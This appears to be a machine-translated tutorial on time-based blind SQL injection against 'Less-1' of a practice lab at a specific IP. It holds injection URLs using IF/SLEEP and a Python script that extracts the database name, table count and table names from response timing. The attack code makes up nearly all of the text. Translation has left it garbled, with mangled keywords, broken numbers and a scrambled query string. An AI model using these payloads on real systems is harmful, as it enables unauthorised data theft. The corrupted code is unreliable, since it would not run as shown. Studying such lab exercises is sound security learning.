HTTP: // 43.247 . 91.228 : 84 / Less- . 1 / ID =? . 1 ' and IF (length (Database ()) =. 8, SLEEP (. 5), 0) - + Note: http: //43.247.91.228 : 84 / less-1 / for the address range, the request is sent, if the length of the name of the database in response to eight delayed 5 seconds, otherwise it will stand to obtain a response (under conditions not so bad mesh case) is the following code. use SLEEP () delayed implantation guess PYTHON scripting solution database name length
import requests url1 = "http://43.247.91.228:84/Less-1/?id=1' and if \ (length(database())={_}, sleep(5), 0) --+" url2 = "http://43.247.91.228:84/Less-1/?id=1' and if \ (ascii(substr(database(),{_},1))={__}, sleep(5), 0) --+" url3 = "http://43.247.91.228:84/Less-1/?id=1' and if \ ((select count(*) from information_schema.tables \ where table_schema={_})={__}, sleep(5), 0) --+" url4 = "http://43.247.91.228:84/Less-1/?id=1' and if \ (ascii(substr((select table_name from information_schema.tables \ TABLE_SCHEMA _} = {WHERE limit} {__,. 1), {} ___,. 1))} = {____, SLEEP (. 5), 0) \ - + I) " # ################################################ ############### # length guess database name: function- # parameters meaning: n length # returns the result: success: database name length # failed: 0 # #### ################################################## ######### DEF getLength (n-): for I in Range (. 1,. 1 n-+ ): payload = url1.format (_ = Print (payload) ANS = requests.get (payload) # Response time less than 5 seconds Description guess the correct IF (ans.elapsed.seconds> =. 5 ): return (I) BREAK the else : Continue return (0) # ############## ################################################# # function: guess the name of the database # meaning of the parameters: length database name length # returns the result: success: database name string # failed: empty string # ################# ############################################## DEF getName (length ): Database= "" # Database initialized to an empty string name for I in Range (. 1,. 1 + length ): for J in Range (. 1, 128 ): payload = url2.format (= I _, __ = J) Print (payload ) ANS = requests.get (payload) # response time less than 5 seconds Description guess the correct IF (ans.elapsed.seconds> =. 5 ): Database + = CHR (J) BREAK the else : Continue return (Database) ################################################### ############# # function: guess the number of tables in a database solution # meaning of the parameters: database database name # number range n table # returns the result: success: the number of tables # failed: 0 # ################################################# ############## DEF getTablesNum (Database, n-): for I in Range (. 1,. 1 n-+ ): payload + Database +Url3.format = (_ = " ' " " ' " , __ = I) Print (payload) ANS = requests.get (payload) IF (ans.elapsed.seconds> =. 5 ): return (I) BREAK the else : Continue return (0) # ############################################# ################## # function: guess the table name # meaning of the parameters: database database name # tablesNum number of tables # length tableNameLength table name # Returns: an array of all the table names in the list # ############################ ################################### DEF getTablesName (Database, tablesNum, tableNameLength): Table = "" Tables = [] for I in Range (. 1,. 1 tablesNum + ): for J in Range (. 1,. 1 tableNameLength + ): for K in Range (. 1, 128 ): payload = url4.format (_ = " ' " + database + "'", __ = i-1, ___ = j, ____ = k) print (payload) ans = requests.get(payload) if (ans.elapsed.seconds >= 5): table += chr(k) break else: continue tables.append(table) table = "" return (the Tables) ################################################### ############# # # main function # # ############################### ################################ IF the __name__ == " __main__ " : length = getLength (10 ) Database = getName ( length) tablesNum = getTablesNum (database, 10 ) Tables = getTablesName (database, tablesNum,. 8 ) Print ( " length of database name: " + STR (length)) Print( " Database name: " + Database) Print ( " the number of tables in the database: " + STR (tablesNum)) Print ( " all tables as follows: " ) for Table in Tables: Print (Table)